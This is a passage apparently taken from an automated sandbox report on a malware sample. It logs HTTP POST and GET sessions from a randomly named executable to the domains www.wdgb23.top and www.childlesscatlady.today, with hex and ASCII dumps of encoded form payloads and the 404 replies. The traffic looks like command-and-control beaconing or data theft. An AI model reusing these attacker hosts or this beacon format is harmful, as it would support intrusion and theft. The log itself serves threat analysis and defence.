                                                                                                  Data Ascii: o0I8bJWh=3IFEbfxcIU/Yno5oo7zqAPyr9u7OGl86CkV3mpZpDd+7jVsdaW9hVfTpn0uxLmXxMYK/JS5CfNravQprrwnCqy5WklfEhM9p2+7ZoWTILE/JubsBSyOq//zdIHvhTq9JIVf1H9+pjnCfoT7WlL67ZByzfRW7HREp5N8Y8cEqh0a8Q+JQk4BZeQ72NL0qMrLBIszw0GKUwiw5BP5F8cLjCwHnD+8XQoqa0HCH2fL+LfXnaQoD5M6sTvEoYII6rDvKPK55u2ZDuoyZ27wMVYvPdL/2RcXK25DyQhYB5AapM8CWWOiINn99eg6MKDxsMUNT793mPJ2UTr3gQbxrHfdUQm/ccdiQZ21vqgYkWeRnyRAoFJmGrkjO8NcIIEP3LbLyfhoutYn6mn50dTRVPYHndWaYegNK08D8jP/Da5SBCL1zjgcTTbobeYd4rKLx/V1DT6fRSMUyyW3l5C60PX3WM9HyL+X2q+G2UBq5WR0ByJjpX0KJ2qD/E2KA84NnLWJVQ1JQtsP6X1WdzOqgJuDPFdW1WKzrGnvR7b9HCxwA/EJEwn4Tiiq6X9YYkkpJwWx8w639colLEdYSVB+Vh01CakoxMcHjvGh9J1tcwQ4nOA2HwI9NelBjHiwg+Qn9cJJlc0DYK/4r6lFtVCTUURB1msoa5wFzhi4GbguxPfB1DxgWgoAgH/vsdw0YE+UBfML+SH1FabTXtSbqfN/3lSHqWP5+EoFHKm5f5WYoy4KXE8DteWk/RhPiWdVtOv5tIENqyiq3K/DS8WGCijJ5a3JIhlar2zhRgHzstT4SNRauVMXR39GOStdcUywv+CGQsopIvqOB6TbB/4wqfjU/l9azDZQ8R7fE7SIG1r87KiIEOttV5NcSe3jeMFFUZjK3EQDCcgUeOwkoYm+XeUjWvAi3RqXosoBlNTsMG6y4IZLJ4ptBh/5+Flr5LUsMOSvER7T3UxAs0keQsC9oO0DU2it7dY5S6/MObkzcRcogRNfdwyW [TRUNCATED]
                                                                                                  Oct 21, 2024 13:16:25.531397104 CEST211OUTData Raw: 39 69 65 2f 52 38 52 34 32 62 4f 52 45 7a 37 41 42 41 7a 4c 43 38 5a 69 4f 51 6c 68 46 2b 49 52 49 55 4c 6e 65 5a 45 44 63 68 31 49 71 54 6b 36 48 53 51 48 6e 6c 56 61 6b 30 68 69 4d 4e 36 4c 69 32 73 73 61 4c 72 58 42 47 72 71 50 36 61 76 6c 53
                                                                                                  Data Ascii: 9ie/R8R42bOREz7ABAzLC8ZiOQlhF+IRIULneZEDch1IqTk6HSQHnlVak0hiMN6Li2ssaLrXBGrqP6avlS4nJIFu3G+HF3M5YiR7jge/NdnOJVqFbRwjnuTvjNnbQpcYl5d7W63voJRHzd7XwuKn8bWu0ExlWqcO5M9Y8nVrIIkEXt0GyIZWlV5IMJ1PFqNTgV+rA3wmTnSTQ2VsL5N
                                                                                                  Oct 21, 2024 13:16:26.471731901 CEST302INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 21 Oct 2024 11:16:26 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 138
                                                                                                  Connection: close
                                                                                                  ETag: "66ad66a8-8a"
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  16192.168.2.2249183206.119.82.148801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:28.145299911 CEST722OUTPOST /v5ff/ HTTP/1.1
                                                                                                  Host: www.wdgb23.top
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.wdgb23.top
                                                                                                  Content-Length: 205
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.wdgb23.top/v5ff/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 33 49 46 45 62 66 78 63 49 55 2f 59 6e 70 35 6f 70 71 7a 71 61 76 79 72 2b 75 37 4f 49 46 38 38 43 6b 5a 2f 6d 73 35 35 44 71 61 37 6a 67 49 64 61 6b 56 68 46 50 54 71 70 55 75 31 50 6d 57 37 4d 59 4b 6a 4a 54 56 43 66 4d 4c 61 76 78 56 72 2f 42 6e 42 31 53 35 55 6f 46 66 42 68 4d 78 4b 32 2b 32 43 6f 57 37 49 4c 43 58 4a 76 62 38 42 45 30 61 71 30 76 7a 62 59 33 75 35 54 72 41 4a 49 56 76 39 48 39 75 70 6a 57 75 66 72 43 33 57 76 34 69 37 50 78 79 75 53 78 58 49 41 44 42 79 78 74 6f 4e 2b 38 63 74 6f 45 4b 6a 64 2b 45 63 69 35 42 74 49 69 48 33 41 39 6c 30 4b 6f 2b 61 4c 51 3d 3d
                                                                                                  Data Ascii: o0I8bJWh=3IFEbfxcIU/Ynp5opqzqavyr+u7OIF88CkZ/ms55Dqa7jgIdakVhFPTqpUu1PmW7MYKjJTVCfMLavxVr/BnB1S5UoFfBhMxK2+2CoW7ILCXJvb8BE0aq0vzbY3u5TrAJIVv9H9upjWufrC3Wv4i7PxyuSxXIADByxtoN+8ctoEKjd+Eci5BtIiH3A9l0Ko+aLQ==
                                                                                                  Oct 21, 2024 13:16:29.086075068 CEST302INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 21 Oct 2024 11:16:28 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 138
                                                                                                  Connection: close
                                                                                                  ETag: "66ad66a8-8a"
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  17192.168.2.2249184206.119.82.148801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:30.697880030 CEST2472OUTPOST /v5ff/ HTTP/1.1
                                                                                                  Host: www.wdgb23.top
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.wdgb23.top
                                                                                                  Content-Length: 3629
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.wdgb23.top/v5ff/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 33 49 46 45 62 66 78 63 49 55 2f 59 6d 49 70 6f 72 4e 66 71 57 66 79 71 69 65 37 4f 47 6c 38 34 43 6b 56 2f 6d 70 5a 70 44 59 57 37 6a 54 77 64 61 47 39 68 57 66 54 71 76 55 75 78 4c 6d 58 79 4d 63 69 56 4a 53 6c 34 66 49 76 61 76 51 46 72 72 7a 50 43 74 79 35 57 73 46 66 47 68 4d 77 58 32 2b 6e 46 6f 57 2f 79 4c 43 2f 4a 76 70 45 42 46 45 61 70 78 76 7a 62 59 33 75 6c 54 72 41 31 49 56 58 6c 48 38 33 75 6a 67 53 66 72 6a 37 57 6a 37 36 34 62 42 79 79 4d 42 57 50 48 51 34 2b 35 4e 38 63 38 64 67 4d 68 31 6d 38 52 73 42 51 6b 2f 56 65 43 51 37 31 43 72 30 71 44 4c 4c 44 49 73 7a 73 30 47 4b 55 77 6a 63 35 54 76 35 46 38 5a 2f 67 47 77 48 6e 41 2b 38 57 64 49 76 72 30 48 58 57 32 66 62 41 4c 73 37 6e 62 53 41 44 75 4d 36 73 56 66 46 68 59 49 49 37 6c 6a 75 6c 50 4b 77 45 75 32 4a 54 75 6f 79 5a 32 34 6f 4d 53 4f 7a 50 64 62 2f 32 54 63 58 4c 2f 5a 44 7a 51 68 63 6a 35 44 47 70 4d 39 61 57 56 63 71 49 50 6c 46 2b 52 77 36 4a 62 7a 78 75 64 6b 4e 61 37 39 37 63 50 4a 2f 35 54 [TRUNCATED]
                                                                                                  Data Ascii: o0I8bJWh=3IFEbfxcIU/YmIporNfqWfyqie7OGl84CkV/mpZpDYW7jTwdaG9hWfTqvUuxLmXyMciVJSl4fIvavQFrrzPCty5WsFfGhMwX2+nFoW/yLC/JvpEBFEapxvzbY3ulTrA1IVXlH83ujgSfrj7Wj764bByyMBWPHQ4+5N8c8dgMh1m8RsBQk/VeCQ71Cr0qDLLDIszs0GKUwjc5Tv5F8Z/gGwHnA+8WdIvr0HXW2fbALs7nbSADuM6sVfFhYII7ljulPKwEu2JTuoyZ24oMSOzPdb/2TcXL/ZDzQhcj5DGpM9aWVcqIPlF+Rw6JbzxudkNa797cPJ/5TqHgQeFrF8FUQW/fS9iUP25jqgBzWedoyTUoEYmGhB3NwdcKNEP9B7LQfhsMtav6mTF0PixVFPzoKWaDJwNn/cDRjPbta7qRF6FzjQcTT9UYSod3/aLnw10cT6fdSOMYynPl5CK0BkfWM9HxeOW/geKIUBu9WRBcyK7pWnSJ2v3/QGKA1YNgC2JMQ0sltuPMXlqd9PagPsbPQNWzUKzuCnv27bNHCz8Q/EREwFQTkG+6cdYc7UpWwWxKw6jhco0pEbgSVA+V2hVCTEowOcHvlWgDJ112wV8NOCWHxpdNfUBjBywmhAn9SpIlc06jK98R6ghtU2PUBBB0qMod7wF8wy4YbgexPaZ1DxIWjbYgMs3sAw0NA+UfVsORSHkpaYeQtRvqfc/3iRjpaf58BoFdAG5j5WYey8eHHJ3teHE/QAPhLNVqEP4vFkMVym3SK7/78h+CijZ5aB9IhVar2zhegHzotTFhNQqQVMXR2pqOTflcbiwq8CGHoopCvqKr6Tzn/7EqND0/l9awOJQ7Lrfb7SEX1r8VKiMEJbtV4f4SfV7eIlFUJzK0egDPcgU0OyQ4Yn+XfkDWsG+2OqXT74BvWDgPG6+gIYfJ7etBhu5+FVr5UEt+EyvRfbXrUxcC0gaAsztoIEzU6El4VI5TlvMMbkO3RcgeRN3Nw0G [TRUNCATED]
                                                                                                  Oct 21, 2024 13:16:30.703522921 CEST1675OUTData Raw: 39 69 64 31 78 38 64 34 32 62 77 52 42 6a 64 41 43 4d 7a 4c 58 34 5a 69 36 4d 6c 6d 31 2b 4f 49 59 55 55 6a 65 56 77 44 63 64 78 49 71 6a 65 37 7a 53 51 48 56 64 56 4d 43 41 68 6f 4d 4e 2f 46 43 32 72 73 61 47 2b 58 42 57 4a 71 4d 79 77 6f 52 36
                                                                                                  Data Ascii: 9id1x8d42bwRBjdACMzLX4Zi6Mlm1+OIYUUjeVwDcdxIqje7zSQHVdVMCAhoMN/FC2rsaG+XBWJqMywoR64oZIF4E+hUV3wx4iA7jgm/NVjOI5DFe1wjlGTuTNkMwpaUF597W2evoRzHyh7XwyKmfjWrEExnWqFQJMoXc7SrMR7WjpoB2UebENfAeBdJF6NTjNf1jKslxPmBWCV+/ojAJogquXGenH8XrplBj5wSg1mq+9L7TqY
                                                                                                  Oct 21, 2024 13:16:31.623502970 CEST302INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 21 Oct 2024 11:16:31 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 138
                                                                                                  Connection: close
                                                                                                  ETag: "66ad66a8-8a"
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  18192.168.2.2249185206.119.82.148801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:33.414256096 CEST469OUTGET /v5ff/?o0I8bJWh=6KtkYrJQJQPjnaYYjYn2UYf3+tCUC2UyI0IqyotYPNah/j4zRWdFJ7rRvhmSGGewLKOTJjNwEsTAi0VkpGXovzF7okvrkNx58uXZpArpUgDeiKoUGkOd+5nnUTXs&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.wdgb23.top
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:16:34.383672953 CEST302INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 21 Oct 2024 11:16:34 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 138
                                                                                                  Connection: close
                                                                                                  ETag: "66ad66a8-8a"
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  19192.168.2.224918615.197.148.33801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:39.629641056 CEST2472OUTPOST /0l08/ HTTP/1.1
                                                                                                  Host: www.childlesscatlady.today
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.childlesscatlady.today
                                                                                                  Content-Length: 2165
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.childlesscatlady.today/0l08/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 62 61 62 51 30 52 55 55 69 65 57 73 6f 79 4a 41 6a 48 73 68 76 64 58 63 75 56 48 70 66 72 51 4b 73 52 68 4e 4e 39 56 2b 34 31 69 46 74 58 65 2f 6a 48 44 6e 66 35 57 33 61 48 34 47 33 4c 42 61 6d 37 4d 50 38 51 5a 75 50 39 52 4e 4c 31 4c 79 43 41 49 36 6d 51 32 72 51 6e 58 77 4e 78 77 59 53 64 63 37 47 70 77 43 74 6f 56 68 4a 62 50 64 64 34 59 46 42 64 67 6f 58 35 64 61 32 45 68 6d 68 43 6f 36 78 62 53 33 78 4c 55 64 2f 35 6a 79 56 68 45 47 65 74 44 70 4a 36 47 4f 64 46 4d 74 2b 54 4c 31 6f 74 57 47 56 70 57 74 70 42 54 34 46 46 51 48 34 4a 77 62 31 49 52 70 77 66 71 4b 43 50 52 6d 73 63 6b 36 58 46 6d 73 72 48 70 64 31 51 6e 39 4d 75 6d 6a 4b 59 58 66 6f 56 48 50 38 6b 4b 61 37 34 68 4d 36 44 4d 50 35 33 77 79 32 37 65 55 5a 70 62 43 49 2f 33 54 49 45 76 74 70 48 59 71 74 56 58 64 44 55 37 57 50 35 51 4c 5a 4a 31 4a 61 68 6b 56 6a 52 6f 6b 33 56 66 38 6d 46 62 4f 4f 78 4c 67 64 69 78 57 6d 6f 65 41 4f 49 7a 4b 33 31 37 6b 43 59 4d 72 55 70 54 76 6b 4c 36 45 64 49 64 34 39 [TRUNCATED]
                                                                                                  Data Ascii: o0I8bJWh=babQ0RUUieWsoyJAjHshvdXcuVHpfrQKsRhNN9V+41iFtXe/jHDnf5W3aH4G3LBam7MP8QZuP9RNL1LyCAI6mQ2rQnXwNxwYSdc7GpwCtoVhJbPdd4YFBdgoX5da2EhmhCo6xbS3xLUd/5jyVhEGetDpJ6GOdFMt+TL1otWGVpWtpBT4FFQH4Jwb1IRpwfqKCPRmsck6XFmsrHpd1Qn9MumjKYXfoVHP8kKa74hM6DMP53wy27eUZpbCI/3TIEvtpHYqtVXdDU7WP5QLZJ1JahkVjRok3Vf8mFbOOxLgdixWmoeAOIzK317kCYMrUpTvkL6EdId49M2yLa4yT8KBgXryJmusdEPZs4a5VwFyzuLeESrRFdC1Fg0oW7W1f5hID4RZuzEGRHCjs71A8S4PJjwadtGRZsJB9mL6noBeiKhBj/4WJjBQtA8Z3ywUwXuXLKoHu0GrkTndh2ISSJGMNxtOE+PD3MABPE7rvzdbSqQx+3mfN5KIwf34u9pWB8u8P6g9Hd42JVZRkx02aT0q9W6IN61q0LCNYy28fgG7ikOMoD/F5R/4P/Qc09niBxXBl9iZuUvh0ea2bah9g+6dLDj/oki8wW2hbYaYynmA5SLw4hoS/NL4j9jqCwPSTBk3E7xMcx+cnBV4m0EYDUQIXrNMGMqMvLyMuENI7TWA+LrNAJaDDRwFNO50XfIuXnkttABK+2VNUnVUJoZL8ygmtcgqX9cfo1uD2d+SfHdkUFmYo2uopD1GQZKHmsInbTkQkZ5N4dikcUKS52OShLKptTWEklR5gVxy8vfEqEaF4pvlft3H073uyuDGACNHKQtcX562N6OCCJvUfRYknK5rVSiH+0M1oeQGR4ocRvd31WBW6YqFjFGXHzQ3aTVQvlBfHO7QArx79Oz0ervgpC31VhG9rEvqHc2DLWrvJttK1qv4a2DKReBGi2VR2/4KFyRT4wZlgPiVelYGlKBe/FQJ/+eGotZamdS4jqDyMr0rdev [TRUNCATED]
                                                                                                  Oct 21, 2024 13:16:39.635128975 CEST247OUTData Raw: 5a 41 79 76 69 78 68 42 70 66 77 59 6f 58 53 34 47 78 76 6e 4c 2b 7a 66 6a 4b 68 68 30 37 70 50 44 52 64 36 49 38 4f 49 37 55 72 4d 44 31 2f 6f 33 52 45 51 2b 4a 4b 37 55 57 61 68 78 77 69 33 42 5a 65 63 30 64 44 6a 77 61 75 44 55 56 36 4a 79 56
                                                                                                  Data Ascii: ZAyvixhBpfwYoXS4GxvnL+zfjKhh07pPDRd6I8OI7UrMD1/o3REQ+JK7UWahxwi3BZec0dDjwauDUV6JyVZMrW+XjLdiLCl1HwYKkTU/pAmnx9kvh10pohk/2lSaOj6FhTa2MCGaokIklSFzZW5MunK+SX4/hhtWsCyeou1qCpoObGVkfGj+sIutML9WoVQTJUEuEMa4xBP7PPXdgFZvAcEPMhQydhJyfWX2BB2xtsBSIRHFB14


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  20192.168.2.224918715.197.148.33801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:42.174022913 CEST758OUTPOST /0l08/ HTTP/1.1
                                                                                                  Host: www.childlesscatlady.today
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.childlesscatlady.today
                                                                                                  Content-Length: 205
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.childlesscatlady.today/0l08/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 62 61 62 51 30 52 55 55 69 65 57 73 6f 78 68 41 69 57 73 68 75 39 58 63 74 56 48 70 56 4c 51 4d 73 52 6c 76 4e 38 68 75 35 47 43 46 74 6d 75 2f 6a 31 72 6e 54 5a 57 32 43 58 35 42 36 72 42 50 6d 37 4d 54 38 56 5a 75 50 39 46 4e 49 58 7a 79 45 42 49 31 37 51 32 70 62 48 58 78 4e 78 39 6f 53 64 51 72 47 6f 6f 43 74 72 42 68 49 66 76 64 57 2b 45 46 55 39 67 71 56 35 64 4e 32 45 73 37 68 47 45 4d 78 59 57 33 78 35 77 64 2f 73 76 79 52 77 45 47 52 4e 43 4f 4f 36 48 69 4f 48 78 38 79 52 50 6c 70 63 43 50 56 6f 71 56 6a 78 44 62 63 6c 45 59 36 35 63 31 36 2f 45 35 31 38 72 6e 52 51 3d 3d
                                                                                                  Data Ascii: o0I8bJWh=babQ0RUUieWsoxhAiWshu9XctVHpVLQMsRlvN8hu5GCFtmu/j1rnTZW2CX5B6rBPm7MT8VZuP9FNIXzyEBI17Q2pbHXxNx9oSdQrGooCtrBhIfvdW+EFU9gqV5dN2Es7hGEMxYW3x5wd/svyRwEGRNCOO6HiOHx8yRPlpcCPVoqVjxDbclEY65c16/E518rnRQ==


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  21192.168.2.224918815.197.148.33801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:44.715029955 CEST2472OUTPOST /0l08/ HTTP/1.1
                                                                                                  Host: www.childlesscatlady.today
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.childlesscatlady.today
                                                                                                  Content-Length: 3629
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.childlesscatlady.today/0l08/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 62 61 62 51 30 52 55 55 69 65 57 73 71 53 35 41 6b 78 51 68 73 64 58 62 68 31 48 70 66 72 51 49 73 52 68 76 4e 39 56 2b 34 30 75 46 74 52 43 2f 6a 58 44 6e 63 35 57 32 53 6e 34 47 33 4c 42 56 6d 37 59 66 38 51 64 59 50 2f 70 4e 4c 30 4c 79 43 44 77 36 76 77 32 72 66 48 58 32 4e 78 39 78 53 64 41 76 47 70 64 76 74 72 5a 68 49 71 7a 64 51 4f 45 43 49 4e 67 71 56 35 64 2f 32 45 74 50 68 43 67 55 78 5a 2f 79 78 4c 34 64 2f 4a 6a 79 58 52 45 46 54 4e 43 43 4e 36 47 4d 64 46 41 51 2b 54 4c 78 6f 74 43 2f 56 70 4b 74 72 54 72 34 46 47 34 49 38 5a 77 59 78 49 52 70 30 66 71 55 43 50 51 6e 73 63 6b 36 58 45 61 73 74 58 70 64 31 55 4c 2b 52 65 6d 6a 44 34 58 47 6e 31 4c 62 38 6b 65 77 37 34 52 63 36 51 41 50 34 31 59 79 38 72 65 55 49 70 62 45 49 2f 32 54 48 6b 75 2b 70 45 6f 69 74 56 48 33 44 55 37 57 50 2f 6b 4c 65 62 64 4a 64 78 6b 56 76 78 6f 70 38 31 65 4f 6d 46 50 34 4f 79 58 67 64 6a 35 57 6b 59 75 41 4d 4b 4c 56 38 6c 37 66 47 59 4d 74 44 35 54 2b 6b 50 61 75 64 4d 45 77 39 [TRUNCATED]
                                                                                                  Data Ascii: o0I8bJWh=babQ0RUUieWsqS5AkxQhsdXbh1HpfrQIsRhvN9V+40uFtRC/jXDnc5W2Sn4G3LBVm7Yf8QdYP/pNL0LyCDw6vw2rfHX2Nx9xSdAvGpdvtrZhIqzdQOECINgqV5d/2EtPhCgUxZ/yxL4d/JjyXREFTNCCN6GMdFAQ+TLxotC/VpKtrTr4FG4I8ZwYxIRp0fqUCPQnsck6XEastXpd1UL+RemjD4XGn1Lb8kew74Rc6QAP41Yy8reUIpbEI/2THku+pEoitVH3DU7WP/kLebdJdxkVvxop81eOmFP4OyXgdj5WkYuAMKLV8l7fGYMtD5T+kPaudMEw9NGyLYQye5mB83r9HGuoZEzVs4DqVwBIzsPeFDrRN+q2AQ0uGrWsb5hTD4VnuzkGEmajv49A4hgQBzwnKdG4XMIC9mfinqpwi6RBiP4WZxZRuQ8YtiwC/3vOLKp0u2ekkmjdh24SSbeMNxtPUOOKh8c/PEHRvzAcStox+mWfN4KI9f34ndpdasvBP61AHfomKlNRkTs2YRcq726KP61p5rDyYym8fhiRinOMpi/F6w/4GfQQ6dm8BxWvl9nYuXWa0d+2bYJ9i7WdGjj8kEi4723fbYSIymqq5RbwpwISyfz4hdjsKQPSGRkVE7pmcwSinAt4mAgYIUQPeLNDA8qL8byauF9I7TKA+KDNH4aDHn4FBe5qZ/IOcHgBtARO+3BdUhFUL6xL7xIpzcgoS9cV/lur2d+WfC50X0GYok2oui1FcZKA/8JnfTlnkZpj4c7jcn+S53+Sh+WpujWEklR2gVx28vjQqBmv4pvlf83H0IPu5ODDYCMTcgt8X5PdN6XXCJDUQgUknK5obCiAzUM2oechR4o+RvR32g5W6LiFjnuXXjQ3SzVf01BcHO7mAuZr9Kn0faPgo3b2ZxG+6UvGes7dLWmsJsJK1aD4YnDKRuBGhWVSuv4fYidP4x1PgOSFew0Gk45e5C8Km+eLstYcmcuDjqL6MrMRdZD [TRUNCATED]
                                                                                                  Oct 21, 2024 13:16:44.720576048 CEST1711OUTData Raw: 35 41 30 76 69 77 75 66 59 69 49 59 6f 57 68 34 46 74 76 6e 4b 4f 7a 66 6c 47 68 68 45 37 71 58 6a 52 59 69 59 38 4a 42 62 55 4e 4d 44 30 59 6f 7a 49 52 51 39 6c 4b 37 48 75 61 68 45 45 69 33 78 5a 63 48 45 63 65 6e 77 65 38 44 55 70 32 4a 7a 6c
